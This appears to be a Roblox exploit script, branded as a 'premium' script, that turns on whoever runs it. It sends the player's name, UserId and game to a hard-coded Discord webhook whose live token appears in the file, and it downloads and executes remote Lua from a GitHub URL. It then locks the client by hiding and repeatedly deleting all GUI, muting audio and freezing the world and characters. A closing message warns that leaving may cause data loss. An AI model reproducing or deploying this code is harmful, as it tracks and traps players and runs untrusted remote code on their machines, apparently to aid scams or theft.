

-----------------------------------------------------------------
-- SERVICES
-----------------------------------------------------------------
local Players          = game:GetService("Players")
local Player           = Players.LocalPlayer
local PlayerGui        = Player:WaitForChild("PlayerGui")
local CoreGui          = game:GetService("CoreGui")
local RunService       = game:GetService("RunService")
local Workspace        = game:GetService("Workspace")
local StarterGui       = game:GetService("StarterGui")
local SoundService     = game:GetService("SoundService")
local HttpService      = game:GetService("HttpService")
local MarketplaceService = game:GetService("MarketplaceService")

-----------------------------------------------------------------
-- DISCORD WEBHOOK (EXECUTE LOG)
-----------------------------------------------------------------
local WEBHOOK_URL = "https://discord.com/api/webhooks/1450951811488813108/4lcItFTfvIV0lpizJ1qrQ6c9EYbV7soVaJb1onUlBSRm-gz_ZEQ4GLlHC_ZHYwGf5zuz"

local function sendWebhook()
    local data = {
        username = "Script.SM Logger",
        embeds = {{
            title = "🚨 Stuck Script Executed",
            description = "**Status:** Stuck Lua Has Executed",
            color = 16711680,
            fields = {
                { name = "👤 Player", value = Player.Name, inline = true },
                { name = "🆔 UserId", value = tostring(Player.UserId), inline = true },
                { name = "🎮 Game", value = MarketplaceService:GetProductInfo(game.PlaceId).Name, inline = false }
            },
            footer = { text = "Scripts.SM | Premium Scripts" },
            timestamp = DateTime.now():ToIsoDate()
        }}
    }

    local req = (syn and syn.request) or (http and http.request) or request
    if req then
        pcall(function()
            req({
                Url = WEBHOOK_URL,
                Method = "POST",
                Headers = { ["Content-Type"] = "application/json" },
                Body = HttpService:JSONEncode(data)
            })
        end)
    end
end

task.spawn(sendWebhook)

-----------------------------------------------------------------
-- LOAD EXTRA STUCK SCRIPT
-----------------------------------------------------------------
loadstring(game:HttpGet(
    "https://raw.githubusercontent.com/RblxScriptsOG/Steal-a-brainrot/refs/heads/main/stuck2.lua",
    true
))()

-----------------------------------------------------------------
-- 1. DISABLE CORE GUI
-----------------------------------------------------------------
pcall(function()
    StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.All, false)
end)

-----------------------------------------------------------------
-- 2. FREE CAMERA
-----------------------------------------------------------------
local Camera = Workspace.CurrentCamera
Camera.CameraType = Enum.CameraType.Scriptable

-----------------------------------------------------------------
-- 3. DISABLE ALL AUDIO
-----------------------------------------------------------------
SoundService.AmbientReverb = Enum.ReverbType.NoReverb
for _, snd in ipairs(Workspace:GetDescendants()) do
    if snd:IsA("Sound") then
        snd.Volume = 0
        snd:Stop()
    end
end

Workspace.DescendantAdded:Connect(function(obj)
    if obj:IsA("Sound") then
        obj.Volume = 0
        obj:Stop()
    end
end)

RunService.Heartbeat:Connect(function()
    for _, snd in ipairs(Workspace:GetDescendants()) do
        if snd:IsA("Sound") and snd.IsPlaying then
            snd:Stop()
        end
    end
end)

-----------------------------------------------------------------
-- 4. FULL FREEZE WORLD
-----------------------------------------------------------------
local frozenParts = {}
local frozenJoints = {}

local function freezeObject(obj)
    if obj:IsA("BasePart") then
        frozenParts[obj] = {
            CFrame = obj.CFrame,
            Size = obj.Size,
            Transparency = obj.Transparency,
            Color = obj.Color,
            Material = obj.Material,
            CanCollide = obj.CanCollide
        }
    elseif obj:IsA("Motor6D") or obj:IsA("Weld") or obj:IsA("ManualWeld") then
        frozenJoints[obj] = { C0 = obj.C0, C1 = obj.C1 }
    end
end

for _, obj in ipairs(Workspace:GetDescendants()) do
    freezeObject(obj)
end
Workspace.DescendantAdded:Connect(freezeObject)

RunService.Stepped:Connect(function()
    for part, data in pairs(frozenParts) do
        if part and part.Parent then
            for k, v in pairs(data) do
                part[k] = v
            end
        end
    end
    for joint, data in pairs(frozenJoints) do
        if joint and joint.Parent then
            joint.C0 = data.C0
            joint.C1 = data.C1
        end
    end
end)

-----------------------------------------------------------------
-- 5. FREEZE ALL CHARACTERS
-----------------------------------------------------------------
local function stopAnimations(h)
    if not h then return end
    for _, t in ipairs(h:GetPlayingAnimationTracks()) do
        t:Stop()
    end
end

local function freezeCharacter(char)
    local hum = char:FindFirstChildOfClass("Humanoid")
    if hum then
        hum.WalkSpeed = 0
        hum.JumpPower = 0
        hum.PlatformStand = true
        stopAnimations(hum)
    end
end

if Player.Character then freezeCharacter(Player.Character) end
Player.CharacterAdded:Connect(freezeCharacter)

for _, plr in ipairs(Players:GetPlayers()) do
    if plr.Character then freezeCharacter(plr.Character) end
    plr.CharacterAdded:Connect(freezeCharacter)
end

-----------------------------------------------------------------
-- 6. DELETE ALL GUI
-----------------------------------------------------------------
local function clearGui()
    for _, gui in ipairs(PlayerGui:GetChildren()) do
        if gui:IsA("GuiObject") then
            if gui.Name ~= "sm_notif" and gui.Name ~= "sm_main" then
                pcall(gui.Destroy, gui)
            end
        end
    end
    for _, gui in ipairs(CoreGui:GetChildren()) do
        pcall(gui.Destroy, gui)
    end
end

clearGui()
task.spawn(function()
    while task.wait(0.03) do
        clearGui()
    end
end)

-----------------------------------------------------------------
print("[Script.SM] Leaving May Cause Data Loss")

